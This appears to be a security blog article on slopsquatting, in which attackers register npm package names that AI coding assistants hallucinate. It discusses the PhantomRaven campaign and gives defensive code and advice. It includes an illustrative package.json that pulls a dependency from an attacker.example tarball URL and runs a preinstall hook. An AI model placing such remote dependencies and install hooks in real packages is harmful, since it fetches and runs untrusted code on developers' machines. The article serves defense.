Slopsquatting turns AI package hallucinations into a new software supply chain attack path. PhantomRaven shows why this is now an active npm threat, not a theoretical one.
Asking an AI coding assistant for a package recommendation introduces a supply chain risk that used to require a human typo. No misspelling needed. The model invents the name, the developer trusts the suggestion, and the attacker is already waiting. That is slopsquatting, and it is why the technique matters.
Before AI, package attacks mostly depended on familiar mistakes: typoing a dependency name, trusting a fake domain, or installing a package that looked close enough to a real one. With slopsquatting, the attacker does not wait for the developer to make the naming mistake. The model makes it first. Then the attacker registers the invented package and waits for the developer to trust the suggestion.
That sounds like a small change. It is not. It means the package discovery layer inside the IDE, terminal, and chat window is now part of the software supply chain attack surface.
Figure 1: The slopsquatting kill chain — from prompt to payload.
Software supply chain social engineering has always targeted trust shortcuts: typosquatted package names, lookalike domains, and packages that look close enough to the real thing. These tactics work because developers move quickly. If a package name looks plausible and the install succeeds, it often gets the benefit of the doubt.
Slopsquatting belongs in that lineage. It is the same social engineering logic, but routed through model output instead of direct human error.
Figure 2: How software supply chain attacks have evolved.
AI coding assistants — GitHub Copilot, Cursor, ChatGPT, Claude, Codeium — now offer code suggestions in the IDE, in chat, and at the command line. That is exactly why these tools create a new attack surface. They are not just writing functions. They are increasingly acting as package discovery engines.
The underlying model failure here is package hallucination: the assistant recommends a dependency that sounds legitimate but does not actually exist.
The USENIX analysis of package hallucinations shows this is not a niche problem:
| Metric | Value |
|---|---|
| Models tested | 16 |
| Avg hallucination rate | 19.6% |
| Commercial models (avg rate) | ~5% |
| Open-source models (avg rate) | ~21% |
| Unique fake package names observed | 205,474 |
| Repeated for same prompt | ~45% |
| Reappeared across 10 follow-up prompts | ~60% |
That last point is the big one. If hallucinated names were one-off randomness, slopsquatting would be noisy and unreliable. But repeated hallucinations create predictable targets attackers can claim in public registries.
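The repeatability is what makes the targets minable. A minimal sketch of how a researcher (or attacker) could surface stable hallucinations from repeated model runs — the sample data and package names below are invented for illustration, not real model output:

```javascript
// Given several independent model runs that each suggested a list of
// package names, keep the names that recur across at least minRuns runs.
// Recurring names are the predictable targets worth registering.
function stableHallucinations(runs, minRuns) {
  const counts = new Map();
  for (const run of runs) {
    for (const name of new Set(run)) {
      counts.set(name, (counts.get(name) || 0) + 1);
    }
  }
  return [...counts.entries()]
    .filter(([, n]) => n >= minRuns)
    .map(([name]) => name)
    .sort();
}

// Hypothetical output from three runs of the same prompt.
const runs = [
  ["graphql-utils-pro", "left-pad"],
  ["graphql-utils-pro", "express"],
  ["graphql-utils-pro", "totally-random-one-off"],
];
console.log(stableHallucinations(runs, 3)); // names seen in all 3 runs
```

A one-off invention is noise; a name a model emits in most runs of the same prompt is a registration target.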
This is what makes slopsquatting more dangerous than simple typosquatting. The attacker is no longer guessing what a tired developer might mistype. They can watch what models repeatedly invent.
The best case study is PhantomRaven.
Koi Security's original write-up described PhantomRaven in October 2025 as a campaign spanning 126 malicious npm packages and more than 86,000 downloads. The operation harvested npm tokens, GitHub credentials, and CI/CD secrets while hiding its payload in what Koi called "invisible dependencies."
A follow-up analysis in March 2026 tied three new waves to the same actor — and as of March 10, 2026, 81 of the 88 newly identified malicious packages were still available on npm, with 2 of 3 C2 servers still live.
That matters because PhantomRaven is not a one-off package compromise. It is a repeatable campaign with infrastructure, naming strategy, and evasion patterns.
PhantomRaven did not rely on random lookalikes. The actor targeted package names that developers — or models — would plausibly expect to exist. That is not proven to be AI-hallucination-driven, but it exploits the exact same trust gap slopsquatting weaponizes: if a name feels right in context, it gets installed.
One example is the `@graphql-codegen/` scope prefix. That is slopsquatting in practice: registering packages that feel semantically correct in context, even if no legitimate package ever existed there before.
The attacker also paired the naming strategy with a technical delivery method built for evasion. npm's package.json documentation allows tarball URL dependencies, and npm's scripts documentation still supports lifecycle hooks like preinstall, install, and postinstall.
PhantomRaven used a technique researchers call Remote Dynamic Dependencies (RDD).
Figure 3: PhantomRaven's Remote Dynamic Dependency delivery mechanism.
The npm-hosted package looked mostly harmless. A dependency pointed to an attacker-controlled tarball URL, the real payload was fetched during install, and lifecycle hooks executed the malicious logic. That design is important because it lets malicious behavior live outside the package body most scanners inspect first.
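In package.json terms, the RDD pattern looks roughly like this. Every name and URL here is an invented placeholder for illustration, not an actual PhantomRaven artifact; the only real mechanics are the ones npm documents — URL dependencies and install lifecycle scripts:

```json
{
  "name": "some-plausible-helper",
  "version": "1.0.0",
  "dependencies": {
    "inner-helper": "http://attacker.example/pkgs/inner-helper.tgz"
  },
  "scripts": {
    "preinstall": "node collect.js"
  }
}
```

The published package body stays clean; the tarball behind the URL can serve different content per request, which is why static scans of the registry copy see little.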
Slopsquatting introduces three problems older software supply chain social engineering did not have at the same scale.
1. The bad suggestion can come from a trusted workflow. The developer is not pulling a random package from a forum. The dependency appears inside the IDE or AI chat panel they already use every day.
2. The attack surface is generative. Models can produce a huge volume of plausible-sounding fake names across frameworks, languages, and package ecosystems.
3. The detection signal is weaker. A typo can look suspicious if you know the real package. A hallucinated name may look perfectly valid because it matches the code context.
| | Typosquatting | Slopsquatting |
|---|---|---|
| Error source | Human typo | Model hallucination |
| Scale | Limited by common misspellings | Generative — unlimited plausible names |
| Trust signal | None — random install | High — suggested by trusted AI tool |
| Detection | Levenshtein distance from real package | No "real" package to compare against |
Figure 4: Typosquatting vs. slopsquatting — side by side.
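The detection row deserves a concrete illustration. A standard edit-distance check catches a typo because it sits one or two edits from a real name, but a hallucinated name (the example name below is invented) has no near neighbor to compare against:

```javascript
// Wagner–Fischer edit distance: the classic typosquat detector.
function editDistance(a, b) {
  const dp = Array.from({ length: a.length + 1 }, (_, i) =>
    Array.from({ length: b.length + 1 }, (_, j) =>
      i === 0 ? j : j === 0 ? i : 0
    )
  );
  for (let i = 1; i <= a.length; i++) {
    for (let j = 1; j <= b.length; j++) {
      dp[i][j] = Math.min(
        dp[i - 1][j] + 1, // deletion
        dp[i][j - 1] + 1, // insertion
        dp[i - 1][j - 1] + (a[i - 1] === b[j - 1] ? 0 : 1) // substitution
      );
    }
  }
  return dp[a.length][b.length];
}

console.log(editDistance("requets", "requests"));        // tiny: typo territory
console.log(editDistance("graphql-utils-pro", "graphql")); // large: no near neighbor
```

Distance-based heuristics assume a legitimate reference point exists; slopsquatted names are dangerous precisely because they don't shadow one.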
This is why slopsquatting should be treated as AI-mediated social engineering, not just rebranded typosquatting.
The mitigation story is not "use less AI." It is "stop treating AI-suggested dependencies as pre-validated."
Security and platform teams should tighten controls now: treat every AI-suggested dependency as unvetted until proven otherwise, pin and review what lands in package.json, and run npm audit signatures where available.
The USENIX research also suggests a longer-term direction: fine-tuning and self-detection techniques can reduce hallucination rates. That is promising, but it is not a substitute for registry, CI, and developer-side controls.
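One practical control is a CI gate that vets new dependencies against registry metadata before they merge. This is a sketch under stated assumptions — the metadata shape and thresholds are invented for illustration, not npm's actual API:

```javascript
// Gate an AI-suggested dependency on simple registry-metadata policy.
// meta is assumed to be pre-fetched registry data in this hypothetical shape.
function vetDependency(meta, now = Date.now()) {
  const reasons = [];
  if (!meta.exists) {
    reasons.push("package does not exist on the registry");
  } else {
    const ageDays = (now - meta.firstPublished) / 86400000;
    if (ageDays < 30) reasons.push("published less than 30 days ago");
    if (meta.weeklyDownloads < 500) reasons.push("very low download count");
    if (meta.hasInstallScripts) reasons.push("declares install lifecycle scripts");
  }
  return { allowed: reasons.length === 0, reasons };
}

// A freshly registered, low-download package with install hooks —
// the slopsquatting profile — trips every check.
const suspect = {
  exists: true,
  firstPublished: Date.now() - 2 * 86400000, // 2 days old
  weeklyDownloads: 12,
  hasInstallScripts: true,
};
console.log(vetDependency(suspect)); // allowed: false, three reasons
```

The point is not these specific thresholds but the posture: a dependency that did not exist last month, has no install base, and runs code at install time should never ride into CI on an autocomplete suggestion alone.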
Pre-AI supply chain attacks exploited what developers typed. Slopsquatting exploits what models suggest.
That difference changes the economics of the attack. It gives attackers a scalable way to manufacture believable package names, register them cheaply, and wait inside normal development workflows.
PhantomRaven shows the threat is already live. The packages are real. The infrastructure is real. The attacker tradecraft is improving. Security teams that still think of package risk as a typo problem are defending the last generation of the attack.
The next generation starts with autocomplete.
Sources: USENIX package hallucination research · Koi Security PhantomRaven analysis · PhantomRaven follow-up (March 2026) · npm package.json docs · npm scripts docs